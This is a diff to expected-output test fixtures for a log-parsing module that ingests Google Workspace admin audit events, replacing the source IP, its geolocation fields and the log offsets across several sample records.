@@ -1285,7 +1197,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_PHONE_NUMBER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_PHONE_NUMBER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "event.provider": "admin", "event.type": [ "change", 
@@ -1300,27 +1212,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 9502, + "log.offset": 9480, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -1344,7 +1252,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_RECOVERY_EMAIL\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_RECOVERY_EMAIL\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "event.provider": "admin", "event.type": [ "change", 
@@ -1357,27 +1265,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 9960, + "log.offset": 9937, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -1401,7 +1305,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_RECOVERY_PHONE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_RECOVERY_PHONE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "event.provider": "admin", "event.type": [ "change", 
@@ -1414,27 +1318,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 10345, + "log.offset": 10321, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -1458,7 +1358,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_RELATION\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_RELATION\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "event.provider": "admin", "event.type": [ "change", 
@@ -1473,27 +1373,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 10730, + "log.offset": 10705, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -1517,7 +1413,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_ADDRESS\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_ADDRESS\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "event.provider": "admin", "event.type": [ "change", 
@@ -1532,27 +1428,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 11184, + "log.offset": 11158, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -1578,7 +1470,7 @@ "event.end": "2002-10-02T16:00:00.000Z", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CREATE_EMAIL_MONITOR\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"BEGIN_DATE_TIME\",\"value\":\"2002-10-02T15:00:00Z\"},{\"name\":\"EMAIL_MONITOR_DEST_EMAIL\",\"value\":\"dest@example.com\"},{\"name\":\"EMAIL_MONITOR_LEVEL_CHAT\",\"value\":\"info\"},{\"name\":\"EMAIL_MONITOR_LEVEL_DRAFT_EMAIL\",\"value\":\"info\"},{\"name\":\"EMAIL_MONITOR_LEVEL_INCOMING_EMAIL\",\"value\":\"info\"},{\"name\":\"EMAIL_MONITOR_LEVEL_OUTGOING_EMAIL\",\"value\":\"info\"},{\"name\":\"END_DATE_TIME\",\"value\":\"2002-10-02T16:00:00Z\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CREATE_EMAIL_MONITOR\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"BEGIN_DATE_TIME\",\"value\":\"2002-10-02T15:00:00Z\"},{\"name\":\"EMAIL_MONITOR_DEST_EMAIL\",\"value\":\"dest@example.com\"},{\"name\":\"EMAIL_MONITOR_LEVEL_CHAT\",\"value\":\"info\"},{\"name\":\"EMAIL_MONITOR_LEVEL_DRAFT_EMAIL\",\"value\":\"info\"},{\"name\":\"EMAIL_MONITOR_LEVEL_INCOMING_EMAIL\",\"value\":\"info\"},{\"name\":\"EMAIL_MONITOR_LEVEL_OUTGOING_EMAIL\",\"value\":\"info\"},{\"name\":\"END_DATE_TIME\",\"value\":\"2002-10-02T16:00:00Z\"}]}}", "event.provider": 
"admin", "event.start": "2002-10-02T15:00:00.000Z", "event.type": [ @@ -1597,27 +1489,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 11637, + "log.offset": 11610, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -1641,7 +1529,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CREATE_DATA_TRANSFER_REQUEST\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"DESTINATION_USER_EMAIL\",\"value\":\"dest@example.com\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"a,b,c\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CREATE_DATA_TRANSFER_REQUEST\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"DESTINATION_USER_EMAIL\",\"value\":\"dest@example.com\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"a,b,c\"}]}}", "event.provider": "admin", "event.type": [ "creation", 
@@ -1656,27 +1544,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 12429, + "log.offset": 12401, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -1700,7 +1584,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"GRANT_DELEGATED_ADMIN_PRIVILEGES\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"GRANT_DELEGATED_ADMIN_PRIVILEGES\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", "event.provider": "admin", "event.type": [ "change", 
@@ -1714,27 +1598,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 12926, + "log.offset": 12897, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -1758,7 +1638,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DELETE_ACCOUNT_INFO_DUMP\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"REQUEST_ID\",\"value\":\"id\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DELETE_ACCOUNT_INFO_DUMP\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"REQUEST_ID\",\"value\":\"id\"}]}}", "event.provider": "admin", "event.type": [ "deletion", 
@@ -1772,27 +1652,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 13357, + "log.offset": 13327, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -1816,7 +1692,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DELETE_EMAIL_MONITOR\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"EMAIL_MONITOR_DEST_EMAIL\",\"value\":\"dest@example.com\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DELETE_EMAIL_MONITOR\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"EMAIL_MONITOR_DEST_EMAIL\",\"value\":\"dest@example.com\"}]}}", "event.provider": "admin", "event.type": [ "deletion", 
@@ -1830,27 +1706,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 13780, + "log.offset": 13749, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -1874,7 +1746,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DELETE_MAILBOX_DUMP\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"REQUEST_ID\",\"value\":\"id\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DELETE_MAILBOX_DUMP\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"REQUEST_ID\",\"value\":\"id\"}]}}", "event.provider": "admin", "event.type": [ "deletion", 
@@ -1888,27 +1760,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 14227, + "log.offset": 14195, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -1932,7 +1800,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_FIRST_NAME\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_FIRST_NAME\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "event.provider": "admin", "event.type": [ "change", 
